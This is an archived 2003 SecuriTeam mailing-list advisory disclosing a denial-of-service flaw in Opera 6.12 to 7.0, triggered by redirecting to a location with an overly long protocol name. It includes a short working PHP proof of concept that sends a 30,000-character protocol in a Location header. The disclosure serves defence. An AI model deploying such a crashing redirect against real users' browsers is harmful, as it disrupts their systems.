[NEWS] Opera Denial of Service (Long Protocol Name)

From: SecuriTeam (support_at_securiteam.com)
Date: 07/28/03

  • Next message: SecuriTeam: "[REVS] Port 0 OS Fingerprinting" 
    To: list@securiteam.com
Date: 28 Jul 2003 15:32:30 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    Get Thawte's New Step-by-Step SSL Guide for Apache.
    http://ad.doubleclick.net/clk;5903117;8265118;i

    - - - - - - - - -

      Opera Denial of Service (Long Protocol Name)
    ------------------------------------------------------------------------

    SUMMARY

     <http://www.opera.com> Opera is an alternative browser for both the
    Windows and Linux operating system. The Opera browser has been found to be
    vulnerable to a denial of service attack that can be exploited by
    redirecting the current location to an overly long location (in which the
    protocol name is the long buffer).

    DETAILS

    Vulnerable systems:
     * Opera version 6.12 up to version 7.0

    Exploit (PHP):
    <?php
    for($i=0; 20000+10000>$i; $i++) $prot.="A";
    header("Location: $prot://dd");
    ?>

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:dodo@darkwired.org> dodo.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

  • Next message: SecuriTeam: "[REVS] Port 0 OS Fingerprinting"

    Relevant Pages

    • [NT] TFTPD32 Buffer Overflow Vulnerability (Long filename)
      ... Vulnerable systems: ... * TFTP32 version 2.21 and prior ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] klprfax_filter Symlink Vulnerability
      ... Vulnerable systems: ... the product would create a temporary file ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] The Books Module for the PostNuke CMS XSS Vulnerability
      ... allows remote attackers to cause the product to display third-party data ... Vulnerable systems: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [UNIX] QPopper Buffer Overflow Vulnerability (BULLDIR)
      ... QPopper is the most widely used POP3 ... Vulnerable systems: ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [NEWS] Opera FTP View Cross-Site Scripting Vulnerability
      ... Opera allows running Malicious Scripts due to a bug in 'FTP view' feature. ... allowing embedding of malicious HTML and JavaScript code. ... The information in this bulletin is provided "AS IS" without warranty of any kind. ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)